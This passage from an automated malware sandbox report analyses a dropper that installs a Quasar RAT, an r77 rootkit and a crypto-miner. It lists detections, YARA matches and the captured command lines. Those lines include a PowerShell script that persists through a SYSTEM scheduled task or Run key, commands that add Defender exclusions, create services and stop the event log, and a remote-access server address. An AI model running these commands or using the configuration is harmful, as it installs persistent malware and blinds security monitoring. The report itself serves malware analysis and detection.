/tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontSt
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GR55Qg1hth.exe" , ParentImage: C:\Users\user\Desktop\GR55Qg1hth.exe, ParentProcessId: 7540, ParentProcessName: GR55Qg1hth.exe, ProcessCommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontSt
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7564, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GR55Qg1hth.exe" , ParentImage: C:\Users\user\Desktop\GR55Qg1hth.exe, ParentProcessId: 7540, ParentProcessName: GR55Qg1hth.exe, ProcessCommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontSt
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7564, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\SubDir\Client.exe", ParentImage: C:\Users\user\AppData\Roaming\SubDir\Client.exe, ParentProcessId: 7916, ParentProcessName: Client.exe, ProcessCommandLine: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, ProcessId: 7960, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GR55Qg1hth.exe" , ParentImage: C:\Users\user\Desktop\GR55Qg1hth.exe, ParentProcessId: 7540, ParentProcessName: GR55Qg1hth.exe, ProcessCommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontSt
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\SubDir\Client.exe", ParentImage: C:\Users\user\AppData\Roaming\SubDir\Client.exe, ParentProcessId: 7916, ParentProcessName: Client.exe, ProcessCommandLine: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, ProcessId: 7960, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto", ProcessId: 5848, ProcessName: sc.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7564, ProcessName: powershell.exe

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7372, ProcessName: sc.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-02T09:58:00.964292+010020178712Crypto Currency Mining Activity Detected192.168.2.44973831.220.102.193333TCP
                    2025-01-02T09:58:34.299221+010020178712Crypto Currency Mining Activity Detected192.168.2.44973831.220.102.193333TCP
                    2025-01-02T09:58:34.299494+010020178712Crypto Currency Mining Activity Detected192.168.2.44973831.220.102.193333TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 5fr5gthkjdg71.exeAvira: detected
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeAvira: detection malicious, Label: HEUR/AGEN.1307453
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeAvira: detection malicious, Label: HEUR/AGEN.1307453
                    Source: C:\Program Files\Cuis\bon\Bara.exeAvira: detection malicious, Label: HEUR/AGEN.1329574
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeAvira: detection malicious, Label: HEUR/AGEN.1329574
                    Source: C:\Users\user\AppData\Local\Temp\FA9.tmpAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                    Source: 5fr5gthkjdg71.exeMalware Configuration Extractor: Quasar {"Version": "1.4.0", "Host:Port": "185.148.3.216:4000;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c3557859-56ac-475e-b44d-e1b60c20d0d0", "Tag": "4Drun", "LogDirectoryName": "Logs"}
                    Source: C:\Program Files\Cuis\bon\Bara.exeReversingLabs: Detection: 90%
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeReversingLabs: Detection: 91%
                    Source: C:\Users\user\AppData\Local\Temp\FA9.tmpReversingLabs: Detection: 68%
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeReversingLabs: Detection: 95%
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeReversingLabs: Detection: 95%
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeReversingLabs: Detection: 95%
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeReversingLabs: Detection: 91%
                    Source: 5fr5gthkjdg71.exeVirustotal: Detection: 76%Perma Link
                    Source: 5fr5gthkjdg71.exeReversingLabs: Detection: 63%
                    Source: Yara matchFile source: 5fr5gthkjdg71.exe, type: SAMPLE
                    Source: Yara matchFile source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5fr5gthkjdg71.exe PID: 7452, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: F4R5fd8grr.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7916, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Cuis\bon\Bara.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\FA9.tmpJoe Sandbox ML: detected
                    Source: 5fr5gthkjdg71.exeJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Source: Yara matchFile source: 66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 68.2.conhost.exe.1a646d10000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 66.2.kaptsegthwf.exe.23e07fa0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 68.2.conhost.exe.1a646d40000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 63.2.sc.exe.17cd5af0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 68.2.conhost.exe.1a646d10000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 66.2.kaptsegthwf.exe.23e07f70000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 63.2.sc.exe.17cd5b20000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 63.2.sc.exe.17cd5af0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 68.2.conhost.exe.1a646d40000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 63.2.sc.exe.17cd5b20000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 66.2.kaptsegthwf.exe.23e07fa0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GR55Qg1hth.exe PID: 7540, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeDirectory created: C:\Program Files\CuisJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeDirectory created: C:\Program Files\Cuis\bonJump to behavior
                    Source: 5fr5gthkjdg71.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: sc.exe, kaptsegthwf.exe
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: 5fr5gthkjdg71.exe, 00000000.00000003.1685559832.00000209BC0DE000.00000004.00000020.00020000.00000000.sdmp, 5fr5gthkjdg71.exe, 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmp, 5fr5gthkjdg71.exe, 00000000.00000003.1684931980.00000209BB8D2000.00000004.00000020.00020000.00000000.sdmp, 5fr5gthkjdg71.exe, 00000000.00000000.1682966370.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmp
                    Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C9B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF731C9B110
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C8407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF731C8407C
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CAFC20 FindFirstFileExA,0_2_00007FF731CAFC20
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B63116DCE0 FindFirstFileExW,2_2_000001B63116DCE0
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B88DCE0 FindFirstFileExW,10_2_1B88DCE0
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C77DCE0 FindFirstFileExW,22_2_000001C25C77DCE0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5ACDCE0 FindFirstFileExW,63_2_0000017CD5ACDCE0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B2D604 FindFirstFileExW,63_2_0000017CD5B2D604
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B8DCE0 FindFirstFileExW,63_2_0000017CD5B8DCE0
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F4DCE0 FindFirstFileExW,66_2_0000023E07F4DCE0
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645EEDCE0 FindFirstFileExW,68_2_000001A645EEDCE0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF6502522E0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF6502522E0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF6502522E0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h2_2_00007FF6502522E0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252150
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252150
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252240
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252240
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252240
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252240
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252240
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h2_2_00007FF650252240
